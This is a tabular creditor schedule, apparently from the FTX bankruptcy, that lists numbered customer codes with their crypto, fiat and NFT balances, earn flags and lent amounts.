| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07299572 | | BRZ[0], BTC[0.13567656], ETH[.00000001], FTX_EQUITY[0], NFT (317251828698609222/Solamander #203)[1], NFT (419407916007477132/Romeo #674)[1], NFT (560962888937328250/Entrance Voucher #2015)[1], NFT (563632478503529811/Humpty Dumpty #34)[1], USD[66.46], USDT[0.00000001], WEST_REALM_EQUITY_POSTSPLIT[0] | | |
| 07299574 | | NFT (429638729859202073/Miami Grand Prix 2022 - ID: 93EE227E)[1] | | |
| 07299575 | | NFT (419173311556085170/Masks of Conception )[1] | | |
| 07299576 | | BTC[.00166881], ETH[.018], ETHW[.018], LTC[.02], USD[55.34] | | |
| 07299578 | | BTC[.0001], USD[50.29] | | |
| 07299583 | | ETH[0], NFT (372795519479912042/Brett's Kitchen Cat 2)[1], NFT (575328295373055047/Brett's Kitchen Cat 1)[1], USD[0.00], USDT[0], WEST_REALM_EQUITY_STRIKE-0.33_EXPIRE-2030[0] | | |
| 07299584 | | BCH[.4273698], BCHA[.4273698], BF_POINT[33200], BRZ[.9962], BTC[0.35903196], CAD[12.68], DAI[1.9924], DOGE[1.9924], ETH[5.11056078], ETHW[5.26056078], GRT[.9962], MATIC[1], NFT (294217186970648874/Rubber Duckie #0048)[1], NFT (297903957159645064/The 2974 Collection #1261)[1], NFT (301913577138947367/Hall of Fantasy League #67)[1], NFT (313413063703847007/Birthday Cake #1261)[1], NFT (320852441610896984/Spectra #586)[1], NFT (357465618395409013/Cel's Espresso Mocha)[1], NFT (376596366510669533/blue #2)[1], NFT (413973923138319193/Cel's Espresso Mocha #2)[1], NFT (414967280207640970/Dustie #3548)[1], NFT (444380220003285183/Tim Brown's Playbook: Michigan State vs. Notre Dame - September 19, 1987 #54)[1], NFT (497577706926810544/Adriano Vulcano)[1], NFT (529837160509760667/Terraform Seed)[1], NFT (560489780576948352/Vintage Sahara #606)[1], NFT (562845037015757695/Brett's Test Collection)[1], NFT (573445446219082497/Confetti #257)[1], SOL[.51641915], SUSHI[2.4886], TRX[1.9924], UNI[2.9886], USD[1226.51], USDF[.5], USDT[11.93892101], YFI[1.8796] | USD[1469.85] | |
| 07299585 | | USD[26.08], WEST_REALM_EQUITY[0] | | |
| 07299588 | | BCH[.00029085], BTC[0.00014664], DOGE[.15735], ETH[.00154431], ETHW[4.7626675], HKD[0.01], SOL[.07007175], TRX[.000031], USD[0.50], USDT[.000579] | | |
| 07299590 | | BTC[25.00009872], SOL[12503.11499754], USD[0.00], WEST_REALM_EQUITY_STRIKE-0.33_EXPIRE-2030[0] | | |
| 07299593 | | NFT (294175746627396319/Solamander #543)[1], NFT (340970091213157423/MagicEden Vaults)[1], NFT (370140147909272595/MagicEden Vaults)[1], NFT (378997591067794473/MagicEden Vaults)[1], NFT (395878991055086444/Geckos Spaceship)[1], NFT (411488945332447611/MagicEden Vaults)[1], NFT (499604852847006898/Galactic Gecko #1140)[1], NFT (540059976606662502/Solninjas #79)[1], NFT (544769964248187645/MagicEden Vaults)[1], NFT (545263697842267545/Geckos Spaceship)[1], NFT (562438870710892237/GGSG Brawler Skin)[1], NFT (562870848042453118/Geckos Spaceship)[1], NFT (566067109578807367/Solninjas #69)[1], NFT (575531004193615732/Solamander #311)[1], USD[12.03], WEST_REALM_EQUITY_POSTSPLIT[0] | | |
| 07299601 | | USD[16.29], WEST_REALM_EQUITY_STRIKE-0.33_EXPIRE-2030[0] | | |
| 07299606 | | NFT (333053797211563449/Humpty Dumpty #43)[1], WEST_REALM_EQUITY[0] | | |
| 07299608 | Contingent, Disputed | USD[10.00] | | |
| 07299609 | | BTC[.0025978], ETH[0], ETHW[0], MATIC[18.18371171], NFT (289477550750912347/Streams of Tears)[1], NFT (290186551148479992/Cow #1160)[1], NFT (291663716422262420/Unity #257)[1], NFT (291947507742120675/Sloth #2328)[1], NFT (292798797287565643/Lake of Monsters)[1], NFT (300103675594499596/Claymore Artillery Gun [SE])[1], NFT (302042529231951126/Voidmatter Vial)[1], NFT (306533972591460863/Grim #7190)[1], NFT (310969222516433406/Cow #7791)[1], NFT (312856688169599977/Cycles to Away )[1], NFT (313377860584406552/Little Rocks #993)[1], NFT (314693193016162981/Ocean Energy )[1], NFT (315327133031003373/Cow #2666)[1], NFT (316758869504652386/Humpty Dumpty #3)[1], NFT (321745164579293470/Cool Bean #864)[1], NFT (323793269028644198/Puppy #1160)[1], NFT (324045106859194121/Fanatical Crewman [SE])[1], NFT (325030031980591606/Seer's Eye)[1], NFT (328095228638719063/Joylina's Cantina S1 #157)[1], NFT (329222681124445122/Spectra #627)[1], NFT (330117624018384431/Unity #412)[1], NFT (334716496032303018/Bay Sword Panda)[1], NFT (338382288972806852/Cow #7532)[1], NFT (338442730486738634/Unity #331)[1], NFT (339335427649240218/Vintage Sahara #905)[1], NFT (339489007548495730/Fox #184)[1], NFT (340010566725231870/Little Rocks #1040)[1], NFT (340409163882503930/Cow #7867)[1], NFT (342458178267660545/Joylina's Cantina S1 #3225)[1], NFT (346968449556910055/Unity #497)[1], NFT (353995825607746248/Night Light #822)[1], NFT (355128825637674716/Puppy #100)[1], NFT (356607186078573731/Little Rocks #1543)[1], NFT (357089852967258001/Puppy #587)[1], NFT (360220716246604520/Puppy #4289)[1], NFT (366399699721202084/Solama)[1], NFT (369099789015274890/Puppy #7791)[1], NFT (370764515686982266/Miniverse Weapon #180907)[1], NFT (372880814209333690/NEO-NINJA MINT TICKET)[1], NFT (372973257852880647/NEO-NINJA MINT TICKET)[1], NFT (383804756207450060/Goblin Brain 10424)[1], NFT (398070577368118721/Cow #4289)[1], NFT (398792239580376013/Cow #6373)[1], NFT (399428917652702691/Little Rocks #758)[1], NFT (400233698014700000/The Precious Life)[1], NFT (400235318321336845/Puppy #4387)[1], NFT (400284628370646208/Cow #1105)[1], NFT (400463352587869362/Unstable Drone [SE])[1], NFT (402166331520600271/Solninjas #5654)[1], NFT (407237312595355083/Goblin Brain 10209)[1], NFT (407881551227828333/Puppy #1056)[1], NFT (409990532721778985/Little Rocks #437)[1], NFT (411791799990703360/Coachella x FTX Weekend 2 #26417)[1], NFT (414189825261602402/Grim #7623)[1], NFT (416045060635427762/Doctor's Assistant [SE])[1], NFT (416452228613314865/Cow #2863)[1], NFT (420768607114872968/Reflector #961)[1], NFT (421314991539072526/Puppy #167)[1], NFT (423518656340374927/Good Boy #9)[1], NFT (423693850796567486/Grim #7123)[1], NFT (424758304654526078/Reflector #372)[1], NFT (424952280883507991/Cow #6972)[1], NFT (426610609884596236/Little Rocks #1089)[1], NFT (430629134203328872/Lacunar Leech)[1], NFT (433950026792557873/Colossal Cacti #724)[1], NFT (434808072405032764/TTT #3)[1], NFT (435536464361447598/Puppy #6373)[1], NFT (435803360476367340/Cow #1056)[1], NFT (436052072176094259/Fox Flame)[1], NFT (436220666743652620/Little Rocks #1579)[1], NFT (437170530616487058/Cow #6608)[1], NFT (437180633226900055/Little Rocks #1066)[1], NFT (444862745666737244/The 2974 Collection #1444)[1], NFT (449254213618633497/Cow #587)[1], NFT (449392062477553080/Joylina's Cantina S1 #3222)[1], NFT (449899870433553978/TTT #5)[1], NFT (451145104587287658/0985/TTT)[1], NFT (452025845386981565/TTT #2)[1], NFT (452936951542175692/Solninjas #1638)[1], NFT (453925685139880043/Joylina's Cantina S1 #3213)[1], NFT (460809586983044210/Miniverse Hero #01711)[1], NFT (462137846950550831/Joylina's Cantina S1 #3150)[1], NFT (462243901854428376/Cow #4387)[1], NFT (464206490538175424/Spectral Mist)[1], NFT (467399054202198964/Vintage Sahara #876)[1], NFT (468541589393125481/Puppy #275)[1], NFT (469301626927149540/Draught of Leaves)[1], NFT (473273326790965527/Puppy #7867)[1], NFT (473330308136741072/Royal Key)[1], NFT (473596839921182853/Cost of Creation)[1], NFT (476311053178015112/Goblin Brain 10858)[1], NFT (479262374508520236/Little Rocks #237)[1], NFT (483527627505883470/Assembly Foreman)[1], NFT (487348424647056090/Little Rocks #741)[1], NFT (491069559154696006/Puppy #6972)[1], NFT (491181792074530891/Unity #387)[1], NFT (491525680014099236/Puppy #7217)[1], NFT (492725758434526189/Little Rocks #790)[1], NFT (493326998215512416/Joylina's Cantina S1 #3174)[1], NFT (493813907779502623/Cow #100)[1], NFT (497681771837644481/Good Boy #5298)[1], NFT (497823830662708334/Goblin Brain 10061)[1], NFT (499002336509406970/Little Rocks #698)[1], NFT (502012693981680288/Kill Switch [SE])[1], NFT (502579974454773418/Puppy #1685)[1], NFT (504126594659226561/Golden Hill #755)[1], NFT (507147078630561662/The Hellions #1390)[1], NFT (507438768775672435/OVERDOSED)[1], NFT (510588635486644536/Beasts #262)[1], NFT (511852537662500842/Red Panda #91)[1], NFT (513430676201792966/Reflection '13 #84)[1], NFT (516467700423515507/Cow #227)[1], NFT (517362999808884289/Spectral Mist)[1], NFT (520798335952899028/Grim #7930)[1], NFT (520998000537957837/Lamp of Light )[1], NFT (526566705774967304/Cosmic Creations #05)[1], NFT (527235376872777910/Goblin Brain 3750)[1], NFT (527726836055996002/Puppy #6608)[1], NFT (531970637015217745/Puppy #7532)[1], NFT (534393990448371043/DROP)[1], NFT (536367336280569248/Cow #167)[1], NFT (539346096731136055/Joylina's Cantina S1 #3169)[1], NFT (540189904399992603/6063)[1], NFT (542169694435129654/Chapter 1)[1], NFT (543195475361202837/the sleighooor)[1], NFT (544487224180226544/Goblin Brain 2044)[1], NFT (547581230966465512/Electric Kool-Aid)[1], NFT (549062696123926441/NEO-NINJA MINT TICKET)[1], NFT (550030522077188534/Grim #766)[1], NFT (551150297992361559/Lacunar Leech)[1], NFT (558467551756816735/Cow #4727)[1], NFT (559257334010452318/Fields of Glory)[1], NFT (560208710638213015/Scope of Sight )[1], NFT (560470062037545621/Cow #275)[1], NFT (560733003491813533/Grim #7289)[1], NFT (561124505361206891/Unity #17)[1], NFT (562324775701660827/Puppy #227)[1], NFT (563534208139245323/TTT #4)[1], NFT (569161240003119908/Puppy #2863)[1], NFT (574973859980670489/Puppy #1105)[1], SOL[0], USD[14.00] | | |
| 07299610 | | AVAX[0], BF_POINT[1000], BTC[0], ETH[0], ETHW[0.00092596], NFT (297155100056458740/Serum Surfers X Crypto Bahamas #8)[1], NFT (299750622974859782/Resilience #6)[1], NFT (302433891905611885/APEFUEL by Almond Breeze #724)[1], NFT (529347331535629443/Saudi Arabia Ticket Stub #307)[1], SOL[0], SUSHI[0], USD[0.00], USDT[0.00000001], YFI[0] | Yes | |
| 07299613 | | ETH[0], ETHW[.092], USD[0.00] | | |
| 07299614 | | BTC[0], ETH[0], SOL[0.00000001], USD[0.00], USDT[0] | | |
| 07299615 | | BF_POINT[400], TRX[.000198], USD[0.01], USDT[0] | | |
| 07299616 | | USD[68.18], USDT[1.05555032] | | |
| 07299619 | | ETH[0], USD[1.24] | | |
| 07299624 | | USD[232.15] | | |
| 07299627 | | USD[263.73] | | |
| 07299629 | | SHIB[2], UNI[.00778169], USD[0.00] | | |
| 07299631 | | AAVE[0], BCH[0], BTC[0], DOGE[0], ETH[0], ETHW[0], LTC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], YFI[0] | | |
| 07299632 | | ETH[0.00000001], ETHW[0], NFT (389836474995100903/SolFractal #6157)[1], NFT (539012853980612501/SolFractal #2764)[1], NFT (561770635990260946/SolFractal #5760)[1], SOL[0.00000001], USD[64.10] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07299633 | | NFT [307807973995310414/GSW Round 1 Commemorative Ticket #8][1], NFT [308302936306564884/GSW Western Conference Finals Commemorative Banner #250][1], NFT [322283193137622854/GSW Championship Commemorative Ring][1], NFT [325285224580243688/GSW 75 Anniversary Diamond #707 (Redeemed)][1], NFT [334266569486956474/Warriors Foam Finger #231 (Redeemed)][1], NFT [348674733959023659/GSW 2015 Championship Ring #6 (Redeemed)][1], NFT [366935368816655512/GSW Western Conference Semifinals Commemorative Ticket #180][1], NFT [376217683080546672/GSW Western Conference Semifinals Commemorative Ticket #178][1], NFT [377771249649478623/GSW Round 1 Commemorative Ticket #286][1], NFT [389789048214520783/GSW Championship Commemorative Ring][1], NFT [394232720805156126/GSW Championship Commemorative Ring][1], NFT [409478893900808908/GSW Western Conference Finals Commemorative Banner #255][1], NFT [425745211232087576/GSW Western Conference Finals Commemorative Banner #249][1], NFT [432793740424784045/GSW Western Conference Semifinals Commemorative Banner #179][1], NFT [459160092301840011/GSW Western Conference Finals Commemorative Banner #252][1], NFT [480785082241280328/GSW Western Conference Finals Commemorative Banner #254][1], NFT [497231785722169479/Warriors Logo Pin #120 (Redeemed)][1], NFT [516617874988228853/GSW Round 1 Commemorative Ticket #287][1], NFT [526024390471065373/GSW Western Conference Finals Commemorative Banner #256][1], NFT [527340043628320161/GSW Round 1 Commemorative Ticket #288][1], NFT [532095065020019300/GSW Western Conference Finals Commemorative Banner #251][1], NFT [532173196228924295/GSW Western Conference Semifinals Commemorative Ticket #177][1], NFT [547952963597688788/GSW Championship Commemorative Ring][1], NFT [559735254930256080/GSW Western Conference Finals Commemorative Banner #253][1], USD[0.00] | | |
| 07299634 | | USD[0.00] | | |
| 07299636 | | USD[91.21] | | |
| 07299642 | | USD[0.95] | | |
| 07299644 | | AVAX[.0174025], BTC[0.00008424], ETH[0.04512851], ETHW[0], SOL[0.00677107], USD[4.24], USDT[0.00000765] | | |
| 07299645 | | BTC[.0031905], USD[50.34] | | |
| 07299646 | | AVAX[0], BTC[0], ETH[0], ETHW[0], USD[0.08], USDT[0.00000661] | | |
| 07299647 | | BTC[0.00000001], DOGE[0], ETH[0], ETHW[2.01665577], LTC[0], SOL[0.00000001], USD[0.01], USDT[0] | | |
| 07299650 | | USD[1056.50] | | |
| 07299651 | | USD[0.30], USDT[.77908969] | | |
| 07299653 | | BF_POINT[500], USD[9.56] | | |
| 07299654 | | NFT [341923554925490575/Sun Set #809][1], USD[0.00], WEST_REALM_EQUITY_POSTSPLIT[0] | | |
| 07299656 | | BTC[0.00011547], SOL[.96925], USD[81.57], USDT[1.1876387] | | |
| 07299657 | | USD[22.97] | | |
| 07299658 | | BF_POINT[300], USD[3.25] | | |
| 07299660 | | BTC[0], ETH[0], SOL[86.06485001], USD[2666.93], USDT[0] | | |
| 07299662 | | LTC[0], SOL[0], TRX[.000007], USD[0.91], USDT[0] | | |
| 07299664 | | BTC[.00010391] | | |
| 07299666 | | USD[110.91] | | |
| 07299669 | | USD[85.93] | | |
| 07299671 | | BTC[0.00202053], ETH[0.00129174], ETHW[0.00129174], NFT [294571663088528691/lacets très efficaces][1], USD[332.58], USDT[24.86018359] | | |
| 07299674 | | BF_POINT[700], USD[0.00] | | |
| 07299678 | | BTC[0.00000190], DOGE[0], USD[0.00] | | |
| 07299679 | | SOL[.00625], USD[0.00], USDT[0] | | |
| 07299680 | | BTC[.36507438], USD[50.48] | | |
| 07299687 | | BRZ[3], CUSDT[3], DOGE[2], ETH[0], SOL[0.00322317], SUSHI[0], TRX[1], USD[0.02], USDT[0] | Yes | |
| 07299688 | | BTC[0], ETH[0], LTC[0], NFT [379515092479076019/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #14][1], NFT [439356474548115614/Marcus Allen's Playbook: USC vs. Washington - November 14, 1981 #7][1], NFT [492907763429459567/Bitcoins 2021 3 Drives][1], NFT [496652905929339539/Doak Walker's Playbook: Texas vs. SMU - November 1, 1947 #15][1], NFT [500103535113956330/Entrance Voucher #3601][1], SOL[0], USD[0.03] | | |
| 07299689 | | USD[0.01] | | |
| 07299697 | | SOL[.05676], SUSHI[.0664], USD[2.84] | | |
| 07299698 | | BTC[0], ETH[0], USD[0.00], USDT[0] | | |
| 07299699 | | USD[250.00] | | |
| 07299703 | | USD[0.89] | | |
| 07299706 | | BF_POINT[100], GRT[7.9696], USD[389.08] | | |
| 07299709 | | BTC[0.00002065], PAXG[.000038], SOL[.8275], USD[0.00], XRP[.35] | | |
| 07299712 | | BTC[0.00003817], DOGE[.259], LTC[.00335], SOL[0.00657083], USD[0.20], USDT[.51905398], YFI[.00001005] | | |
| 07299719 | | AAVE[0.00000023], ALGO[.0012], AVAX[0], BCH[0], BTC[0.00009537], DAI[0.00000072], ETH[0], LINK[0.00000003], LTC[0], MATIC[0], MKR[0.00000027], PAXG[0], SOL[0.00086551], SUSHI[0.00000003], TRX[0.00000020], UNI[0.00000013], USD[0.00], USDT[0], XRP[1.336], YFI[0.00000043] | | |
| 07299721 | | SHIB[1], USD[0.00] | | |
| 07299724 | | ETH[2.8], ETHW[2.8], USD[14644.25] | | |
| 07299725 | | NFT [315403257519690714/FTX - Off The Grid Miami #7524][1], NFT [404968462101085403/Imola Ticket Stub #241][1], NFT [448690120245306725/Romeo #1442][1], NFT [536061033010688976/Barcelona Ticket Stub #50][1], NFT [557402540372432710/Humpty Dumpty #353][1] | | |
| 07299726 | | BTC[0.00004665], NFT [435501564541073555/SMB OG][1], SOL[0.00465280], USD[0.31], USDT[0.50423639] | | |
| 07299730 | | AVAX[0], BF_POINT[300], BTC[0.00000001], ETH[0.00000001], LTC[0.00000132], MATIC[0], NFT [532248647166668541/SolSquibbles][1], SHIB[3], SOL[0], SUSHI[0], TRX[.000295], USD[0.00], USDT[0.00000028] | Yes | |
| 07299733 | | BTC[0.03237268], ETH[.04995161], ETHW[.00097883], USD[285.74] | Yes | |
| 07299736 | | SOL[0.00119436], USD[0.16], USDT[.24964315] | | |
| 07299739 | | NFT [295502560513222834/Colossal Cacti #46][1], NFT [347034235093014564/Cosmic Creations #711][1], NFT [399384107343283206/Spectra #855][1], NFT [420982634245869399/FTX Crypto Cup 2022 Key #421][1], NFT [527247834236548118/Vintage Sahara #204][1], NFT [535174057878682628/FTX - Off The Grid Miami #1485][1], NFT [553376634837860299/The Hill by FTX #3090][1], USD[0.00], USDT[0] | | |
| 07299746 | | AAVE[.00000001], BF_POINT[100], DOGE[0], MATIC[0], NFT [295450403041023441/2974 Floyd Norman - CLE 1-0256][1], NFT [341104093059518466/FTX - Off The Grid Miami #258][1], NFT [354714268174168726/Shannon Sharpe's Playbook: Denver Broncos vs. Los Angeles Raiders - January 9, 1994 #22][1], NFT [420169415632235487/JOIN THE DARK SIDE TEE #10][1], NFT [455683639509842665/Shannon Sharpe's Playbook: Baltimore Ravens vs. Denver Broncos - December 31, 2000 #47][1], NFT [462867018753631844/Humpty Dumpty #1643][1], NFT [468956373979070925/Marcus Allen's Playbook: USC vs. Washington - November 14, 1981 #24][1], NFT [489945139267938780/Birthday Cake #1524][1], NFT [499787729445376559/The 2974 Collection #1524][1], NFT [576442483453887434/Saudi Arabia Ticket Stub #1893][1], SOL[0.00000001], UNI[0.00000001], USD[0.00], USDT[0], YFI[0.00000001] | Yes | |
| 07299747 | | USD[10.00] | | |
| 07299752 | | BTC[0.00001873], DOGE[.616], ETH[-0.62126742], ETHW[.000288], SUSHI[.3935], USD[899.35], USD[20], YFI[.000984] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07299753 | | USD[0.37] | | |
| 07299754 | | ETH[0.02419114], ETHW[0.02419114], NFT (337880019766442300/Earl Campbell's Playbook: Houston Oilers vs. Chicago Bears - November 16, 1980 #45)[1], PAXG[.00000001], USD[0.02], USDT[0] | | |
| 07299758 | | BTC[.0000088], USD[50.00], USDT[.001582] | | |
| 07299759 | | BTC[0.00011281], SUSHI[.122375] | | |
| 07299761 | | USD[20.88] | | |
| 07299762 | Contingent, Disputed | BTC[0], USD[2.65], USDT[.25972776] | | |
| 07299763 | | USD[688.64] | | |
| 07299768 | | BTC[0.00000825], USD[0.00] | | |
| 07299776 | | BAT[.00000001], BTC[0], DAI[.00000001], ETH[0], ETHW[0], USD[0.00], USDT[0] | | |
| 07299780 | | USD[0.39] | | |
| 07299784 | | NFT (461210655326363740/Rock)[1], USD[1.21] | | |
| 07299787 | | BTC[.00004317], ETH[.0006142], ETHW[.0006142], USD[0.00] | | |
| 07299788 | | USD[563.96] | | |
| 07299789 | | BF_POINT[300], USD[0.00] | | |
| 07299791 | | AVAX[-0.04900560], BCH[-0.00028061], BTC[-0.00002337], LINK[-0.05212013], LTC[-3.13895973], SOL[0.00734250], USD[240.50], USDT[1.41599569] | | |
| 07299792 | | BTC[.0000985], ETH[.046953], ETHW[.046953], SOL[1.2987], SUSHI[4.995], USD[1.23] | | |
| 07299797 | | BTC[-0.00001486], DOGE[0], ETH[0], ETHW[0], GRT[0], LINK[0], LTC[0], MATIC[0], SOL[0], SUSHI[0], UNI[0], USD[0.34], YFI[0] | | |
| 07299799 | | BTC[.00002099], DOGE[288.852], SHIB[1399800], USD[1.91] | | |
| 07299801 | | BTC[.0000924], USD[0.00], USDT[.002] | | |
| 07299803 | | BTC[0], USD[1.55] | | |
| 07299804 | | BTC[.000034], USD[198.19] | | |
| 07299806 | | GRT[25.974], SUSHI[10.47], USD[2.13] | | |
| 07299807 | | USD[0.01], USDT[.95905836] | | |
| 07299808 | | BTC[.00002253], UNI[.0434], USD[1.13], USDT[1.2690444] | | |
| 07299809 | | USD[16100.00], USDT[.64956207] | | |
| 07299810 | | USD[446.80] | | |
| 07299813 | | AUD[0.00], BTC[0], CAD[0.00], EUR[0.00], GBP[0.33], LINK[0], SUSHI[0], USD[0.00], USDT[0] | | |
| 07299815 | | BTC[.00082504], ETHW[.00672237], NFT (303728118656830932/Barcelona Ticket Stub #1519)[1], NFT (393475121819352593/Good Boy #5722)[1], NFT (395730736108072518/The Hill by FTX #143)[1], NFT (405812786385191534/FTX - Off The Grid Miami #341)[1], NFT (408894343765755565/Fendi)[1], NFT (432277576615974927/Monaco Ticket Stub #27)[1], NFT (575647752145554254/Australia Ticket Stub #937)[1], SOL[.09518509], USD[11.64], USDT[0.00002639] | | |
| 07299816 | | BCH[0.00245663], KSHIB[1], SOL[.02], USD[2.54], USDT[1.81371694] | | |
| 07299819 | | BF_POINT[700], BTC[.00021369], USD[0.07] | | |
| 07299824 | | USD[25.00] | | |
| 07299825 | | USD[2.52] | | |
| 07299831 | | AAVE[0], AVAX[8.96596489], BTC[0.00015704], ETH[0.00100118], ETHW[0.00064484], MATIC[0], SOL[0.00500587], USD[0.24], WBTC[0.00004090] | | |
| 07299832 | | USD[5.65] | | |
| 07299833 | | BTC[0.00002570], DOGE[.766], ETH[.0000751], ETHW[.0002256], SOL[.00738401], USD[113.67] | | |
| 07299834 | | BCHA[.00078825], BTC[0.00000933], ETH[.00029509], ETHW[.00029509], USD[1.40], USDT[0] | | |
| 07299836 | | USD[0.00] | | |
| 07299838 | | AVAX[0], BCH[0], BTC[0.00240004], DOGE[0], ETH[0.03600000], ETHW[0.03672792], LINK[5.40000000], LTC[0], MATIC[0], NEAR[.4684445], NFT (509610578992066745/FTX - Off The Grid Miami #2951)[1], SOL[0], UNI[0], USD[15.27] | | |
| 07299839 | | BTC[0], SOL[0.00049367], USD[0.01], USDT[0] | | |
| 07299840 | | BCH[0.00000008], BTC[0.00004046], DOGE[.0000001], ETH[0.00000005], ETHW[0.00000005], LINK[.0000001], LTC[.00000003], SOL[.0023911], TRX[.000446], USD[0.80], USDT[0.40612189] | | |
| 07299842 | | USD[0.00] | | |
| 07299844 | | USD[0.00] | | |
| 07299848 | | BTC[0.00000001], DOGE[0], GRT[0], SOL[0.00000002], SUSHI[0], USD[0.00] | | |
| 07299851 | | BTC[0], ETH[.000252], ETHW[.000252], SOL[0], USD[3.55] | | |
| 07299852 | | BTC[.000078], USD[199.89] | | |
| 07299853 | | AVAX[.11786128], BCH[0], BTC[0.00020000], DOGE[353548.80898783], ETH[0], ETHW[29.89960827], LINK[1047.62349453], LTC[1398.07678529], MATIC[55971.60549834], MKR[0], NFT (305743188106702186/Coogi #1837)[1], NFT (334882261591239298/Coogi #1810)[1], NFT (413096892574541014/Coogi #1814)[1], NFT (419869110889905828/Night Light #684)[1], NFT (482243269785743077/Coogi #1917)[1], NFT (513259325385106746/Coogi #1905)[1], SOL[2074.29949990], TRX[0], USD[6.14], USDT[.009766], WBTC[0] | | LINK[1035.554415], MATIC[48224.567033], SOL[2007.959077] |
| 07299857 | | USD[0.00] | | |
| 07299860 | | USD[0.00] | | |
| 07299861 | | LTC[.00538], USD[0.00] | | |
| 07299863 | | BTC[.0000837] | | |
| 07299866 | | SOL[0], USD[0.00], USDT[0] | | |
| 07299867 | | USD[1.53] | | |
| 07299869 | | BTC[.0000891], LTC[.007916], USD[0.00] | | |
| 07299870 | | USD[3.22], USDT[.14861] | | |
| 07299874 | | ETH[.00000001], ETHW[0], SOL[.00535941], USD[0.00] | Yes | |
| 07299875 | | USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07299878 | | BTC[0.00000001], ETH[0], USD[0.67] | | |
| 07299879 | | BCH[.00020575], BCHA[.00020575], BTC[0.00001203], ETH[0], SOL[0], USD[0.00] | | |
| 07299883 | | BTC[.00006285], ETH[.0001135], USD[0.00] | | |
| 07299886 | | BTC[.000001], USD[0.91] | | |
| 07299887 | | USD[155.63] | | |
| 07299888 | | BF_POINT[200], USD[920.67] | | |
| 07299889 | | USD[4.47] | | |
| 07299890 | | TRX[.504], USDT[0] | | |
| 07299892 | | USD[282.46] | | |
| 07299901 | | USD[1.57] | | |
| 07299902 | | BF_POINT[300], USD[566.59] | | |
| 07299903 | | SOL[0], USD[8.98], USDT[0] | | |
| 07299904 | | USD[10.00] | | |
| 07299906 | | BTC[0], DOGE[0], NFT (307015000020629646/SolSoul-04760)[1], SOL[0], USD[0.01], USDT[0] | | |
| 07299907 | | AVAX[0], BCH[0], BTC[0.00210000], ETH[0.01920563], ETHW[0.00233800], KSHIB[71377.59], LTC[.00875], MATIC[0], NEAR[2061.0232], NFT (545803890455869720/Entrance Voucher #1859)[1], SHIB[72018540], SOL[.00917], TRX[.0000001], UNI[3.15], USDT[5781.62159000] | | |
| 07299908 | | ETHW[.000847], NFT (318626892482635973/FTX - Off The Grid Miami #190)[1], SOL[.00702], USD[0.00] | | |
| 07299911 | | BF_POINT[1300], USD[0.00] | | |
| 07299912 | | ETH[1], ETHW[1] | | |
| 07299916 | | USD[0.76] | | |
| 07299918 | | LTC[.009962], USD[50.00] | | |
| 07299919 | | BTC[.00015062], DAI[.79191819], NFT (439627881186017726/FTX - Off The Grid Miami #1501)[1], USD[0.00], USDT[16.87505988] | | |
| 07299922 | | BTC[0], ETH[0], ETHW[0.01107650], SOL[0], USD[4.23] | | |
| 07299924 | | AAVE[.005], AUD[0.40], AVAX[0.01906592], BTC[0.30857154], CAD[0.73], DOGE[40.04795984], ETH[0.00062500], ETHW[0.00062500], EUR[0.56], GBP[0.29], LINK[0.10316825], MATIC[.25], SOL[0.39086471], SUSHI[0], TRX[0.27585048], UNI[0], USD[6.11], USDT[0], YFI[0] | | |
| 07299926 | | USD[0.08] | | |
| 07299927 | | BTC[.00021247], USD[1.29] | | |
| 07299929 | | AAVE[10.821486], ALGO[807.9736], AUD[62.91], AVAX[18.47864], BCH[9.0810072], BRZ[745.77950045], BTC[0.45685087], CUSDT[8261], DAI[461], DOGE[12504.8834], ETH[2.1103054], EUR[107.44], LINK[3.64931], LTC[32.079466], MATIC[435.5412], NEAR[4.84072], PAXG[1.5467], SOL[3.68227], SUSHI[1602.4976], TRX[5760.8374], UNI[34.89956], USD[125.92], USDT[274.08229054], YFI[.1858327] | | |
| 07299932 | | BTC[.0000744], USD[0.07] | | |
| 07299933 | | USD[10.28] | | |
| 07299934 | | BTC[0.00007364], ETH[.00080986], ETHW[.00080986], USD[0.01], USDT[0] | | |
| 07299935 | | BF_POINT[100], BTC[0], USD[1.01] | | USD[1.00] |
| 07299937 | | LTC[.00001444], USD[0.00] | | |
| 07299941 | | USD[0.00] | | |
| 07299943 | | ETH[.24221358], ETHW[.24201468], NFT (300216821016140215/FTX - Off The Grid Miami #3010)[1], USD[0.20] | Yes | |
| 07299945 | | LTC[0], SOL[.00000001] | | |
| 07299946 | | USD[0.00], USDT[0] | | |
| 07299950 | | BTC[0], LTC[0], USD[1.24] | | |
| 07299961 | | BTC[.00004768], USD[5046.70] | | |
| 07299963 | | BTC[0.00002251], USD[1.83] | | |
| 07299965 | | NFT (294660914040857138/Inverse Bear 3D #1572)[1], NFT (369375359783538098/Inaugural Collection #651)[1], NFT (461263750105223891/SolDad #1332)[1], NFT (527371281053438903/Solninjas #2236)[1], NFT (545941219693533223/Solninjas #4207)[1], SOL[.2], USD[3.44], USDT[0] | | |
| 07299973 | | USD[0.01] | | |
| 07299975 | | DOGE[0], ETH[0.00075819], ETHW[0.00106951], NFT (395133796998259652/Mary Jane #1701)[1], NFT (514922313728216935/Serum Surfers #4952)[1], SOL[0], USD[0.00] | | |
| 07299981 | | USD[100.00] | | |
| 07299982 | | ETH[.00000001], ETHW[.00000001], NFT (289344344341697138/2974 Floyd Norman - CLE 5-0164)[1], NFT (297023376032453122/APEFUEL by Almond Breeze #237)[1], NFT (461428477366252638/The 2974 Collection #0654)[1], NFT (491213748175814281/Birthday Cake #0654)[1] | | |
| 07299986 | | BTC[0], ETHW[.0025], SOL[.00254], USD[0.00], USDT[.004882] | | |
| 07299989 | | ETH[.000136], ETHW[.000136], USD[434.17] | | |
| 07299992 | | SOL[.00000001] | | |
